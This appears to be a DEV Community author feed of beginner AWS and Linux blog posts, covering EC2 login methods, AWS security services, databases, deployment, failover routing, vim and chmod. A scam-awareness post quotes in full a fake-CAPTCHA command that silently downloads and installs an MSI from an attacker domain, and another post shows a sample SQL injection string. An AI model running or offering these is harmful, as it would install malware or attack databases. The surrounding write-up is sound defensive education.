DEV Community: Aishwary Gathe

Logging Into EC2 Is Easy… Until You Pick the Wrong Way

Aishwary Gathe — Fri, 09 Jan 2026 02:09:13 +0000

Imagine you have a computer room in school.
Only students and teachers with permission are allowed inside.

That computer room is like an EC2 server in AWS.

Now the big question is:
How do you enter that room safely?

Just like a school has different entry methods, AWS EC2 also has multiple ways to log in.

Let’s learn them using a fun story.

Meet the EC2 School Building

Your EC2 server is a school building.
Inside it:

Runs applications
Stores files
Does important work

AWS does not let just anyone enter.
You need proper access methods.

Method 1: SSH Key Login (The Main Door Key)

This is the most common way to log in to a Linux EC2 server.

Story Version

You are given a special key to enter the computer room.
If you lose it — you can’t enter.
If someone else doesn’t have it — they can’t enter either.

That key is called an SSH Key Pair.

Technical Explanation

You download a .pem key while creating EC2
Use it to log in via SSH
Password login is disabled by default

Example Command

ssh -i mykey.pem ec2-user@server-ip

Good Because

Very secure
No password guessing

Not So Good Because

If you lose the key, access becomes difficult

Method 2: EC2 Instance Connect (Teacher Temporarily Opens the Door)

Story Version

You forgot your key.
So you ask the teacher,
“Can you open the door for 1 minute?”

Teacher checks your ID and opens the door briefly.

That’s EC2 Instance Connect.

Technical Explanation

AWS pushes a temporary SSH key
Works for Amazon Linux
Needs IAM permission

Good Because

No need to store keys
Quick temporary access

Not So Good Because

Limited OS support

Method 3: AWS SSM Session Manager (Remote Control Entry)

Story Version

You don’t even enter the room.
You control the computer from outside using a remote.

No keys.
No doors.
No internet needed.

This is the safest method.

Technical Explanation

Uses AWS Systems Manager
No SSH, no open ports
Works via IAM permissions

Good Because

Very secure
No key management
No port 22 open

Not So Good Because

Needs SSM agent and IAM role

Method 4: RDP Login (Windows EC2 – Password Entry)

This is for Windows EC2 servers.

Story Version

Windows computers have a username + password
like your school computer lab.

Technical Explanation

Login using Remote Desktop (RDP)
Password is decrypted using key pair

Good Because

Easy for beginners
Familiar Windows login

Not So Good Because

Needs port 3389 open
Must be secured properly

Method 5: Bastion Host (Security Guard Building)

Story Version

You can’t enter the main school directly.
First, you enter a small guard room.
Then the guard takes you inside.

That guard room is a Bastion Host.

Technical Explanation

One public EC2 acts as entry point
Private EC2s are accessed through it

Good Because

Extra security
Private servers stay hidden

Not So Good Because

More setup and maintenance

Method 6: AWS CloudShell (School Computer Provided by AWS)

Story Version

AWS says:
“Don’t bring your own computer.
Use mine.”

AWS gives you a ready-made terminal.

Technical Explanation

Browser-based shell
Uses IAM permissions
Can SSH into EC2

Good Because

No local setup
Quick access

Not So Good Because

Still needs network access rules

Quick Comparison Table (Kid Friendly)

Method	Think of it as	Secure	Common
SSH Key	Main door key	Yes	Very
EC2 Instance Connect	Teacher opens door	Yes	Medium
SSM Session Manager	Remote control	Very High	Growing
RDP	Username & password	Medium	Windows only
Bastion Host	Guard room	High	Enterprise
CloudShell	AWS computer	Medium	Quick access

Which One Should You Use?

Beginners → SSH Key / RDP
DevOps & Production → SSM Session Manager
Enterprises → Bastion Host + SSM
Quick testing → CloudShell

Very Short Summary

An EC2 server is like a school computer room.
AWS gives many safe ways to enter it — keys, teachers, remote controls, passwords, and guards.

Some ways are simple, some are very secure, and some are temporary.

The best engineers choose the right door for the right situation.

Security in AWS: Understanding AWS Security Services and How They Protect Your Cloud, Like a 4th-Grade Kid.

Aishwary Gathe — Mon, 29 Dec 2025 03:02:29 +0000

Imagine AWS is a huge digital city.
In this city, there are houses (servers), schools (apps), lockers (databases), and roads (networks).

Now imagine bad people trying to:

Enter houses without permission
Steal secrets
Break windows
Create traffic jams

AWS provides security guards, locks, cameras, alarms, and rules to keep this city safe.

Let’s meet them one by one — like a story.

1. IAM – The ID Card Checker

IAM is like the school gate guard.

Before anyone enters:

“Show your ID card!”

IAM decides:

Who can enter AWS
What rooms they can access
What actions they can perform

Real-World Attack Prevention

If someone steals a password but MFA is enabled, IAM stops them — because they don’t have the phone or OTP.

Prevents:

Unauthorized access
Account takeovers

2. Security Groups – The Door Lock

Security Groups are locks on each classroom door.

They decide:

Who can come in
Who can go out

Only allowed visitors can enter.

Real-World Attack Prevention

If hackers scan your server using random IPs, Security Groups block them instantly.

Prevents:

Port scanning
Unauthorized network access

3. NACLs – The School Boundary Wall

NACLs are the big boundary wall around the school.

They:

Allow or deny traffic at subnet level
Act as an extra layer of defense

Real-World Attack Prevention

If suspicious traffic comes from a bad country/IP range, NACLs block it before reaching servers.

Prevents:

Large-scale unwanted traffic
Network misuse

4. AWS WAF – The Web Bodyguard

WAF is a bodyguard for websites.

It stops:

Bad URLs
Dangerous input
Too many requests at once

Real-World Attack Prevention

If someone tries SQL Injection like:

' OR 1=1 --

WAF blocks it immediately.

Prevents:

SQL Injection
Cross-Site Scripting (XSS)

5. AWS Shield – The Flood Protector

Shield protects against internet floods (DDoS attacks).

Imagine thousands of people trying to enter school at once — Shield manages the crowd.

Real-World Attack Prevention

If attackers send millions of requests to crash your website, Shield absorbs the traffic.

Prevents:

DDoS attacks
Website downtime

6. AWS KMS – The Lock Maker

KMS creates strong locks for your data.

Even if someone steals the data:

“Sorry, it’s locked.”

Real-World Attack Prevention

If a database backup is stolen, encryption makes it useless.

Prevents:

Data theft
Compliance violations

7. Secrets Manager – The Secret Diary

Secrets Manager stores:

Passwords
API keys
Database credentials

Safely and secretly.

Real-World Attack Prevention

Instead of hard-coding passwords in code (which hackers read), Secrets Manager keeps them hidden.

Prevents:

Credential leaks
Accidental exposure on GitHub

8. GuardDuty – The Smart Watchman

GuardDuty never sleeps.

It watches:

Login behavior
API calls
Network traffic

And shouts:

“Something looks suspicious!”

Real-World Attack Prevention

If someone logs in from another country at midnight, GuardDuty alerts you.

Prevents:

Suspicious activity
Crypto mining attacks

9. Inspector – The Health Checker

Inspector checks your servers like a doctor.

It looks for:

Old software
Known security problems (CVEs)

Real-World Attack Prevention

If your server has an unpatched vulnerability, Inspector warns before hackers exploit it.

Prevents:

Exploits
Known vulnerabilities

10. CloudTrail – The CCTV Camera

CloudTrail records:

Who did what
When they did it
From where

Real-World Attack Prevention

If someone deletes a resource, CloudTrail tells you exactly who did it.

Helps in:

Investigation
Compliance audits

11. Security Hub – The Control Room

Security Hub is the central control room.

It collects alerts from:

GuardDuty
Inspector
IAM
Config

And shows everything in one place.

Real-World Benefit

Instead of checking 10 tools, security teams see everything on one dashboard.

How AWS Security Works Together (Kid Style)

AWS doesn’t use one guard.
It uses:

Guards (IAM)
Locks (Security Groups)
Walls (NACLs)
Cameras (CloudTrail)
Alarms (GuardDuty)
Doctors (Inspector)

This is called Defense in Depth.

Super-Short Summary (If you don't like to read!!)

AWS security is like a well-protected school with ID cards, locks, guards, cameras, and alarms.
Each service has a job, and together they stop hackers, protect data, and keep applications safe.

AWS Regional NAT Gateway Explained: How One Regional NAT Simplifies Cloud Networking

Aishwary Gathe — Mon, 15 Dec 2025 12:36:41 +0000

Imagine your school has many classrooms.
Earlier, each classroom had its own gate to go outside.
More gates meant more locks, more guards, and more money.

One day, the school said:

“Let’s make one big main gate for the whole school.”

That’s exactly what AWS did with Regional NAT Gateway.

First, What Is a NAT Gateway?

In AWS, many servers live in private rooms (private subnets).
These servers are safe, but they still need to:

Download updates
Call external APIs
Access the internet

They cannot talk directly to the internet.

So AWS gives them a helper called a NAT Gateway.

Think of a NAT Gateway as a security guard at the gate:

Servers inside can go out
Internet cannot come in

Safe and secure.

The Old Way: One Gate Per Classroom

Earlier in AWS:

Each Availability Zone (AZ) needed its own NAT Gateway
More AZs = more NAT Gateways
More route tables, more cost, more confusion

In school terms:

Every classroom had its own gate
Every gate needed a guard
Teachers had to remember which gate belonged to which class

It worked — but it was complicated.

The New Way: Regional NAT Gateway (NEW!)

AWS introduced Regional NAT Gateway.

Now:

You create one NAT Gateway per region
AWS automatically makes it work across all AZs
No need to create one NAT per AZ

In school terms:

One main gate for the entire school
All classrooms use the same gate
Fewer guards, fewer keys, less confusion

Why Is This Trending?

1. Less Cost

Earlier, you paid for:

Multiple NAT Gateways
Even if traffic was low

Now:

One shared NAT Gateway
Pay only where traffic actually flows

Less waste, more savings.

2. Less Configuration

Earlier, you had to:

Create NAT per AZ
Update route tables carefully
Maintain public subnets in every AZ

Now:

One NAT
Simpler routes
Cleaner architecture

Less setup, fewer mistakes.

3. Easier Deployments

DevOps teams love this because:

Fewer networking components
Faster infrastructure setup
Less chance of misconfiguration

It’s like:

“Open the gate once and everyone can walk out safely.”

4th-Grade Real-Life Example

Imagine your school lunch break.

Old system:

Every classroom had its own exit
Students got confused
Teachers had to manage too many doors

New system:

One big school gate
Everyone exits smoothly
Teachers relax

That’s Regional NAT Gateway.

When Should You Use It?

You should consider Regional NAT Gateway if:

You run multi-AZ applications
You want simpler networking
You want lower operational overhead
You care about cost optimization

Most modern AWS workloads fall into this category.

Important Thing to Remember

Regional NAT Gateway:

Is for internet outbound traffic
Still keeps private servers private
Does not allow internet to initiate connections

Security stays strong — only simplicity improves.

In One Line (Kid Style)

Earlier, every classroom had a gate.
Now the whole school shares one smart gate.

Short Summary

AWS Regional NAT Gateway simplifies cloud networking by replacing multiple AZ-based NAT Gateways with a single regional one.
It reduces cost, configuration complexity, and deployment effort — while keeping security intact.
A smarter, cleaner, and more DevOps-friendly approach to internet access for private resources.

Understanding Different Types of Databases in AWS: When to Use What?

Aishwary Gathe — Tue, 09 Dec 2025 02:57:52 +0000

Selecting the right database is one of the most important decisions in application architecture. AWS offers multiple database services, each designed with a specific purpose in mind — from storing files at scale to handling millions of transactions per second.

In this blog, we’ll break down popular AWS database solutions, explain how they work, where they shine, where they struggle, and help you decide which one fits your use case.

1. Amazon S3 (Simple Storage Service)

Type: Object Storage (Not a traditional DB, but often used like one)

Amazon S3 is built for storing files, documents, backups, media, logs, and large datasets. It’s highly scalable and durable — often used as the foundation of modern cloud storage.

Use Cases:

File storage (images, videos, PDFs)
Backups & disaster recovery
Data lakes for analytics
Static website hosting
Log storage for Big Data pipelines

Pros:

Virtually unlimited storage
99.999999999% (11 9’s) durability
Low cost and pay-as-you-go
Integrates with almost every AWS service
Supports versioning, lifecycle rules, encryption

Cons:

Not suitable for complex queries
No direct relational querying
Latency is higher compared to databases

Great for: Storing large files at scale, data lakes & archival storage.

2. Amazon DynamoDB

Type: NoSQL Key-Value / Document Database

DynamoDB is designed for applications that need ultra-fast performance and should scale automatically without managing servers.

Use Cases:

High-traffic web apps
Gaming leaderboards
IoT Device data
Serverless applications
Shopping carts / user sessions

Pros:

Fully managed (no servers)
Single-digit millisecond latency
Auto scaling with high throughput
Integrates well with Lambda & serverless stack
Global tables for multi-region apps

Cons:

Query patterns must be planned carefully
Joins and complex queries are difficult
Can be expensive at very high throughput

Great for: Real-time, serverless applications with massive scale.

3. Amazon RDS (Relational Database Service)

Type: SQL Relational Database

RDS supports MySQL, PostgreSQL, MariaDB, SQL Server, and Oracle. It’s best when you require structured data with relationships.

Use Cases:

ERP, CRM systems
E-commerce applications
Finance & transactional systems
Traditional business applications

Pros:

Managed backups, patching, scaling
Multi-AZ failover for high availability
Supports complex queries and joins
Familiar SQL environment

Cons:

Scaling vertically is limited
Complex joins can impact performance
More expensive than DynamoDB at extreme scale

Great for: Apps requiring ACID transactions & structured relational data.

4. Amazon Aurora

Type: High-performance Relational Database

Aurora is an advanced and faster version of MySQL/PostgreSQL built for cloud efficiency.

Use Cases:

High-traffic relational apps
SaaS platforms
Financial systems
Enterprise transaction apps

Pros:

Up to 5x faster than MySQL
Automatic replication to 6 copies
Serverless mode available
High availability & fault tolerance

Cons:

Higher cost compared to RDS
Overkill for small projects
Requires planning & configuration

Great for: Enterprise grade scalable SQL workloads.

5. Amazon Redshift

Type: Data Warehouse / Analytics Database

Redshift is built for analytical workloads — not real-time transactions.

Use Cases:

Business intelligence
Data analytics & reporting
ETL pipelines
Multi-TB/PB scale datasets

Pros:

Handles massive data efficiently
Columnar storage for fast queries
Integrates with BI tools like QuickSight
Great for analytics & dashboards

Cons:

Not designed for OLTP (transactional systems)
Needs cluster sizing & cost monitoring

Great for: Running analytical queries on huge datasets.

6. Amazon ElastiCache (Redis & Memcached)

Type: In-memory Cache Storage

Used to speed up applications by caching frequently accessed data.

Use Cases:

Caching API responses
Session storage
Real-time leaderboards
Gaming, streaming, chat apps

Pros:

Ultra-low latency (microseconds)
Reduces DB load significantly
Ideal for high-read workloads

Cons:

Data is volatile unless persisted
Not for primary storage
Needs cache strategy planning

Great for: Performance boost & real-time caching.

7. Amazon Neptune

Type: Graph Database

Perfect for storing relationships like social graphs, recommendations or network connections.

Use Cases:

Social networks
Fraud detection
Recommendation engines
Knowledge graphs

Pros:

Fast graph traversal
Supports RDF & Gremlin
Built for relationship-heavy data

Cons:

Niche use case
Not as common as SQL/NoSQL

Great for: Apps where relationships matter more than data rows.

8. Amazon DocumentDB

Type: Document Database (MongoDB compatible)

Used for JSON-based flexible schema data.

Use Cases:

Content management
Catalog systems
User profiles

Pros:

MongoDB API compatibility
Scales storage automatically
Great for semi-structured data

Cons:

Higher cost for scaling clusters
Not ideal for complex transactions

Great for: MongoDB workloads needing managed infrastructure.

Quick Summary (One-Liner for Each)

Service	Best For	Type
S3	Cheap large object/file storage	Object Store
DynamoDB	Fast, scalable NoSQL workloads	NoSQL
RDS	Traditional relational apps	SQL
Aurora	High-speed advanced relational apps	SQL
Redshift	Analytics & Data Warehousing	Analytical
ElastiCache	Ultra-fast caching	In-memory
Neptune	Relationship/graph-based systems	Graph DB
DocumentDB	JSON documents, MongoDB workloads	Document Store

Final Short Summary

AWS offers a wide range of databases — each designed for a different purpose.
S3 stores files at scale, DynamoDB handles fast NoSQL workloads, RDS/Aurora manage traditional SQL data, Redshift powers analytics, ElastiCache boosts speed, DocumentDB stores JSON documents, and Neptune manages graph relationships.
Choosing the right one depends on your workload, structure, scaling needs, and query type.

Production AWS Deployment Simplified for everyone!

Aishwary Gathe — Sun, 07 Dec 2025 03:51:03 +0000

Remember the feeling of building something exciting as a kid and wanting everyone to see it? Maybe it was a science project, a drawing, or a toy robot made from spare parts. You couldn’t wait to show it to your friends and teachers.

In software development, we experience the same feeling — we build apps, websites, and tools, and eventually, we want the world to use them. That final step of taking something from your laptop and making it live for everyone is called deployment.

Today, AWS has made this process smoother than ever. Just like presenting your project on stage without worrying about lights, setup, or sound, AWS handles much of the heavy work, allowing developers to focus on building instead of struggling with configurations. Let’s explore how AWS simplifies deployment — explained in the simplest way possible, even for a 4th-grade student.

Absolutely — here’s a professional blog, written so simply that even a 4th-grade student could understand the concept, while still being accurate and valuable for cloud/DevOps readers.
It explains deployment + AWS tools that make deployment easier using storytelling & real-life analogies.

What is AWS?

AWS (Amazon Web Services) is like a huge factory + storage + power station + toolbox on the internet.
Developers use AWS to store data, run apps, and deploy projects so people around the world can use them.

Instead of buying big computers, AWS lets you borrow super-computers online, just like renting toys instead of buying them all.

Problem: Deployment Was Hard Earlier

Deploying apps used to mean:

Setting up servers manually
Managing networks
Configuring tools
Handling failures
Keeping everything working 24/7

It was like setting up your robot every single time — very tiring.

AWS made it EASY with new features

Let’s imagine three AWS services as cartoon helpers:

1. AWS App Runner – The Robot Builder

If you have code or a container, App Runner can take it and turn it into a running application automatically.

You say:
"Here’s my app, please run it."
AWS replies:
"Done — and I’ll scale it if more people come!"

No need to manage servers — like having a robot that builds itself.

2. AWS CloudFormation – The Lego Instruction Book

Instead of building everything manually, CloudFormation gives you templates.

Write a file like:

"I want 1 server, 1 database, 1 network."

AWS builds everything automatically — just like following LEGO instructions instead of guessing where pieces go.

New update:
It even builds faster and smarter using optimistic stabilization, saving time during deployment.

3. Regional NAT Gateway – One Door for All

Earlier, each room (Availability Zone) needed its own door (NAT Gateway).
Now AWS gives one big shared door for the whole house (Region).

Less setup, less cost, less confusion.

If private servers want internet access to download updates — they share the same door securely.

4. CodeDeploy – The Safety Officer

Deployments sometimes break things.
But CodeDeploy helps with safe, controlled updates like:

Blue-Green Deployment (new version tested safely before switch)
Rollback if issues appear
Zero-downtime delivery

It’s like replacing your robot’s battery without stopping the robot from playing.

A Real-Life Analogy for Kids

You want to show a dance performance at school.
Here is how AWS makes it easy:

Real Scenario	AWS Example
You practice dance at home	Developers write code on laptop
You need a stage to perform	AWS server/environment
Teachers allow you to perform	Permissions & access
Lights, speakers, mic setup	Networking & deployment tools
You perform without issues	App runs live for users

AWS is like the best school where:

Stage is ready
Lights work automatically
You just need to show your talent

No headaches. Just creativity.

Final Thoughts

AWS is making deployment simpler every day.
With App Runner, CloudFormation, NAT Gateway, CodeDeploy, and many new features — developers don’t need to handle heavy setups manually.

Even a child could understand it like this:

AWS is like a big friendly helper that takes your project from your laptop to the whole world — quickly and safely.

We no longer build everything brick-by-brick.
We build once, and AWS helps us deliver it everywhere.

Aishwary Gathe

S3 Buckets: The Invisible Backbone of Modern Data

Aishwary Gathe — Wed, 03 Sep 2025 02:49:10 +0000

You might have heard your brother, sister, or colleagues in office meetings talk about an S3 bucket. For someone outside the tech world, the term might sound confusing, even intimidating. But the reality is simple: S3 stands for Simple, Secure Storage.

It is one of the most widely used services in cloud computing, and yet most people outside IT don’t realize how much of their daily life already depends on it.

What Exactly Is an S3 Bucket?

Think of it like a digital locker in the cloud. Unlike the physical hard drives on your laptop, an S3 bucket doesn’t run out of space. You can put in a few photos or store petabytes of data — it grows as your needs grow.

But beyond size, its real power lies in safety and accessibility. Data stored in S3 is automatically copied across multiple availability zones. This means even if one data center fails, your files remain safe. And because it’s cloud-based, they’re accessible from anywhere in the world, at any time.

Why Businesses Rely on S3

The adoption of S3 isn’t just about having a place to dump files. It’s about creating a foundation for modern digital operations.

Streaming platforms rely on it to deliver movies and music.
Startups use it to back up their entire applications.
Enterprises run analytics on massive datasets stored inside it.
Researchers keep decades worth of data without worrying about physical storage devices.

From Netflix to small businesses running their first website, S3 quietly powers them all.

The Two Sides of the Coin

Like every technology, S3 comes with trade-offs.
On one side, it offers scalability, durability, and security that few systems in the world can match. On the other side, careless usage can lead to rising costs (especially with data transfers or millions of small file requests), and misconfigured permissions have, in the past, exposed private data publicly.

S3 isn’t a traditional hard drive where you edit files directly; it’s built for storage and retrieval. For businesses, this means designing systems that take advantage of its strengths while managing its limitations.

Why It Matters to You

Even if you’re not an engineer, chances are you’re already interacting with S3 every day — whether it’s when you stream your favorite series, back up photos, or use an app that syncs data seamlessly across devices.

So the next time you hear the phrase “S3 bucket”, don’t think of it as just another tech buzzword. Instead, see it for what it truly is:
the invisible yet reliable foundation of how our digital world stores, protects, and delivers information.

In a world that never stops generating data, S3 is the quiet hero making sure none of it gets lost.

Building Two-Region Failover Routing on AWS — My Hands-On Learning

Aishwary Gathe — Sun, 31 Aug 2025 15:43:30 +0000

Did You Ever Imagine How Businesses Stay Online Even When a Whole Region Fails?

We often take the internet for granted. A website just “works.” But behind the scenes, massive infrastructure decisions ensure that even if an entire cloud region fails, services continue without interruption.

This week, I explored Two-Region Failover Routing on AWS, a hands-on exercise that gave me a practical understanding of high availability (HA) and disaster recovery (DR).

🔹 Why Multi-Region Architecture?

Cloud providers like AWS offer highly available infrastructure within a region. But what happens if the entire region goes down? Power failures, natural disasters, or large-scale outages could make even the most redundant single-region architecture unavailable.

That’s where multi-region failover routing comes in. By replicating infrastructure across two AWS regions, traffic can seamlessly shift if one region experiences downtime.

My Two-Region Setup

I built identical environments in Region 1 and Region 2. Here’s the breakdown of resources:

Region 1 (Primary)

1 VPC with 4 subnets (2 public, 2 private)
1 Internet Gateway
2 Route Tables (public + private separation)
2 Security Groups (public-facing & internal communication)
4 EC2 instances spread across subnets
1 Target Group for application-level routing
1 Load Balancer (ALB for distributing requests)
1 AMI Image (to replicate app servers consistently)
1 Launch Template (to standardize instance creation)
1 Auto Scaling Group (ASG) for elasticity

Region 2 (Secondary / Failover)

A mirror setup to Region 1, ensuring identical infrastructure:

1 VPC, 4 Subnets, 1 Internet Gateway
2 Route Tables, 2 Security Groups
4 EC2 Instances
1 Target Group + 1 Load Balancer
1 AMI Image + 1 Launch Template
1 Auto Scaling Group

By using the AMI image and launch templates, I ensured both regions had consistent server configurations.

The Key – Failover Routing

After creating infrastructure in both regions, I configured AWS Route 53 Failover Routing.

Primary Region: Handles all traffic by default.
Secondary Region: Remains on standby. It only starts receiving traffic if health checks detect that the primary region is unhealthy or unavailable.

This means users never notice downtime — the DNS automatically reroutes them to the secondary region.

What I Learned

Infrastructure Parity Matters – Keeping regions consistent avoids unpredictable behavior during failover.
Health Checks Drive Automation – Without them, Route 53 cannot know when to shift traffic.
Scalability with Auto Scaling Groups – Ensures that whether in normal conditions or failover, workloads scale based on demand.
Real-World Relevance – This is how global-scale companies like Netflix, Amazon, and fintech providers maintain near 100% uptime.

Final Thought

Did you ever imagine that keeping a website online might mean running entire clones of your infrastructure across continents? That’s the power of cloud computing.

This exercise made me appreciate how resilient architectures are built — not just with code, but with thoughtful planning of networks, routing, and automation.

👉 What do you think? Should I create a step-by-step guide on actually setting this up for beginners?

Nothing Comes for Free — If It’s Free, Your Data Is the Price

Aishwary Gathe — Sat, 26 Jul 2025 03:21:15 +0000

How I Almost Fell for a Win+R Human Verification Scam

In today’s digital age, security awareness is just as important as technical skills. While many of us think we can easily spot scams, the truth is that sophisticated attackers use subtle tricks to exploit even tech-savvy users. Recently, I encountered a deceptive and cleverly engineered scam that disguised itself as a Cloudflare verification process. In this blog post, I will break down the details of what happened, explain how the scam works, and share key lessons learned.

The Setup: A Suspicious Link

It started when I clicked on a resource link that led me to the following URL:

https://veriqloudx.com/verfy.msi

At first glance, the site appeared to offer some kind of free software or service—something many users would easily fall for in search of quick tools or access. However, instead of loading a normal webpage, the site redirected me to what looked like a verification page.

The Trap: A Fake Cloudflare Verification

The page displayed a message instructing me to prove I was not a robot by doing the following:

Press Windows + R
Paste a command into the Run dialog
Press Enter
Enter the verification code provided

The command looked like this:

msiexec SKSIA=1401 /package https://veriqloudx.com/verfy.msi /promptrestart LAPBOS=119 /passive NIANS=299

At first glance, the use of technical terms and a familiar format might appear convincing. However, this is where critical thinking and security awareness come into play.

Technical Analysis: Why This Command is Dangerous

Let’s dissect what this command does.

msiexec: This is the Windows Installer command-line utility used to install .msi packages.
/package https://veriqloudx.com/verfy.msi: This instructs your system to download and install an MSI package from an external, unknown source.
/passive: This suppresses user interaction, meaning the installer can run silently without prompting the user for confirmation.
/promptrestart: Prompts the user to restart the system if necessary, commonly used in software installations.
SKSIA=1401, LAPBOS=119, NIANS=299: These appear to be custom public properties passed to the MSI package. Their exact purpose is unknown without analyzing the MSI, but they could be used to trigger specific malicious behaviors inside the package.

By executing this command, the user essentially grants an unknown program from an unverified source the permission to run silently with potentially broad access to the system.

Why This Looked Suspicious

Several red flags immediately stood out:

No real verification system asks users to run system-level commands.
Cloudflare and other verification providers use browser-based CAPTCHAs or JavaScript challenges, never operating system commands.
The domain was untrusted.
veriqloudx.com is not associated with any known vendor or verification service. A legitimate site would use a verifiable domain and SSL certificate.
The MSI was being pulled from an external source.
Downloading and executing installers from unknown URLs is a serious risk, especially when prompted outside of official software environments.
The use of random property names.
The parameters passed to the installer were vague and likely crafted to hide their true purpose.

The Likely Goal: Malware Delivery

The purpose of this scam is likely to deliver malicious software onto the victim’s machine. Potential outcomes include:

Installation of a remote access trojan (RAT), granting the attacker control over your system.
Keyloggers or credential stealers that silently monitor user activity.
Ransomware payloads that encrypt your data and demand payment.
Backdoors that persist even after antivirus removal.

All of this can happen without the user being fully aware, especially when the installer is run in passive mode.

Lessons Learned

1. Never run unknown commands in Win + R, CMD, or PowerShell.
No legitimate service requires this kind of manual verification. Treat it as an immediate red flag.

2. Inspect the domain and certificate.
Use tools like VirusTotal or Whois to inspect unknown domains. A legitimate service will have valid certificates and clear ownership records.

3. Avoid downloading executables or MSI files from unknown sources.
Always go through the official website or verified platform when downloading software.

4. Use a virtual machine or sandbox to test suspicious software.
If you must inspect a suspicious file, isolate it in a controlled environment to avoid infecting your system.

5. Spread awareness.
Many people, including those in technical roles, are still vulnerable to such tricks. Sharing experiences can help others stay safe.

Conclusion

Scams are evolving. They now combine psychological manipulation with technical tools to bypass both human intuition and system defenses. This incident served as a reminder that free is never truly free. If something looks too good to be true—or asks you to do something out of the ordinary—it probably has hidden costs.

In today’s world, your attention, access, and data are all valuable assets. Treat them that way. If it’s free, there’s a good chance your data is the real price.

Written By Human Crafted by AI
Aishwary Gathe

Mastering Linux File Editors: From First Keystroke to Confident Command-Line Editing

Aishwary Gathe — Thu, 26 Jun 2025 16:19:27 +0000

There’s a moment every Linux user encounters. You open a file in the terminal — maybe because a tutorial told you to — and suddenly, you’re inside an editor. The cursor is blinking. You try typing, but nothing happens. You panic, mash keys, and finally escape with :q!, relieved but confused.

If you’ve ever been there — welcome. You’ve just met the mysterious world of Linux file editors, where every keystroke holds meaning, and every action is deliberate.

But what if I told you these tools, intimidating as they may seem, are some of the most powerful assets you’ll ever have on a Linux system?

In this post, we’re going to walk a path — from beginner to confident user — across the most essential Linux file editors: vi, vim, ed, ex, emacs, and pico. You’ll not only understand how to use them, but also why they work the way they do.

Why Learn Terminal Editors at All?

Let’s get real: why not just open VS Code or nano and move on?

Here’s why:

You won’t always have a GUI.
You're often SSH-ed into remote servers with minimal tools.
Some environments (like Docker containers or minimal Linux distros) have only vi or ed.
Speed, flexibility, and sheer power.

The better you get with these tools, the faster and more effective you'll be on any system, anywhere.

Getting Started: Opening a File

To edit a file using any of these editors, you just type the editor’s name followed by the filename:

vi notes.txt
vim config.ini
ed server.conf
emacs report.md
pico todo.txt

If the file doesn't exist, it will be created. If it does, you’ll be dropped straight into edit mode (or some version of it).

A Quick Look at the Editors

1. Vi – The original, lightweight, always-present

Found on nearly every Linux system.
Modal editor (command vs insert mode).
Super fast once you get used to the keybindings.

2. Vim – Vi Improved

Everything vi has + tons of extras (syntax highlighting, plugins).
Ideal for developers and power users.
Most tutorials and cheat sheets are written with Vim in mind.

3. Ed – The line editor

Minimal. Text editing without showing the file.
Great for scripting or ultra-light environments.
You probably won’t use it daily — but good to know it exists.

4. Ex – Ed’s big brother and the command-line backend of vi

Works similarly to ed, but more powerful.
Used in scripting or from within vi/vim for complex operations.

5. Emacs – A world of its own

Not just an editor — it’s practically an operating system.
Highly customizable, supports everything from version control to email.
Steeper learning curve, but a favorite for many hardcore developers.

6. Pico – Simple and beginner-friendly

Created for Pine email but used as a general editor.
No modes. Just point, type, and go.
If you’re a nano fan, pico will feel familiar.

Let’s Get Hands-On: Vim Essentials (Vi Works the Same Way)

You Open a File:

vim notes.txt

And then… nothing seems to happen. That’s because you’re in command mode.

Here’s your survival guide:

Switching Modes

Key	Action
`i`	Insert mode (start typing)
`Esc`	Exit insert mode to command
`a`	Insert after cursor
`O`	Open a new line above

Editing

Command	Action
`dd`	Delete entire line
`x`	Delete character under cursor
`X`	Delete character before cursor
`r`	Replace single character
`u`	Undo last change
`U`	Undo changes on current line

Searching

Command	Action
`/word`	Search forward for 'word'
`?word`	Search backward
`n`	Repeat last search forward
`N`	Repeat last search backward

Saving and Exiting

Command	Action
`:wq`	Write and quit
`:q!`	Quit without saving
`ZZ`	Save and quit (Shift + Z twice)

Real-World Scenarios Where These Editors Matter

1. You SSH into a remote server and need to edit a config file

GUI tools? Gone.
FTP client? Not set up.
vi nginx.conf — and you’re in.

2. A script breaks in production

You’re in a recovery shell with only ed.
Knowing ed commands means you can fix a config file line-by-line.

3. You’re building Docker images

Minimal containers only include vi.
Learning vim means never feeling stuck or blocked.

Tips to Build Muscle Memory

Practice on non-critical files: Open a .txt file and just try deleting lines, moving around, typing.
Use cheat sheets: Stick a printed Vim reference near your monitor.
Challenge yourself: Edit your .bashrc or .gitconfig with Vim for a week.
Set daily “vim drills”: For 5 minutes a day, open Vim and practice 3 commands.

The point isn’t to memorize everything immediately — it’s to feel less lost every time you open the editor.

Why It’s Worth It

These editors feel old-school — but they were built by people who understood something critical: speed matters. When you stop fighting the tool and start dancing with it, you can fly through text at a pace you didn’t think possible.

Text editing becomes art. Muscle memory kicks in. And every keystroke saves you time.

Final Thoughts: You're Not Just Editing Files — You're Leveling Up

Learning Linux file editors is one of those rare skills where the deeper you go, the more it gives back. You don’t just become more productive — you become more self-reliant, more adaptable, and more capable of solving problems in real-time.

It’s not about being a terminal wizard from day one. It’s about building confidence one keystroke at a time.

So go ahead — open that config file. Type i, write a few lines, press Esc, and save with :wq.
You just leveled up.

From The Learners Den
Aishwary Gathe

What Does `chmod 777` Really Mean? (And Should You Be Using It?)

Aishwary Gathe — Fri, 20 Jun 2025 19:01:07 +0000

If you've ever typed chmod 777 into your terminal just to “make something work,” you're not alone.

It’s one of those magical commands developers throw around when permissions are getting in the way. But here’s the thing — that command is powerful, and if you’re not careful, it can open your system up like an unlocked front door with a neon “Welcome Thieves!” sign.

Let’s break it all down in plain English — with real examples, friendly metaphors, and a permission chart that doesn’t require a computer science degree to understand.

Why Do File Permissions Even Exist?

Imagine your Linux system as a shared apartment.

Each file is a room.
Each user is a roommate.
Permissions decide who can do what inside each room.

Do you want your roommate's cousin editing your final project? Probably not. That’s why permissions exist — to protect your files while letting the right people in.

Meet the Permission Tags: `r`, `w`, `x`

Let’s say you own a file. You can control three things:

r (read): Can someone look inside?
w (write): Can they edit or delete it?
x (execute): Can they run it like a program?

These permissions apply to three groups:

Group	Who Are They?
Owner	You
Group	Your teammates (if grouped)
Others	Everyone else

Now combine that with the r, w, and x, and you get something like:

-rwxr-xr--

The Numerical Side of Things (This Is Where 777 Comes In)

Linux lets you set permissions using numbers, not just letters. It’s like a shorthand for “just let me do this fast.”

Here’s the permission value chart:

Permission	Binary	Number	Meaning
`---`	000	0	No permission
`--x`	001	1	Execute only
`-w-`	010	2	Write only
`-wx`	011	3	Write + Execute
`r--`	100	4	Read only
`r-x`	101	5	Read + Execute
`rw-`	110	6	Read + Write
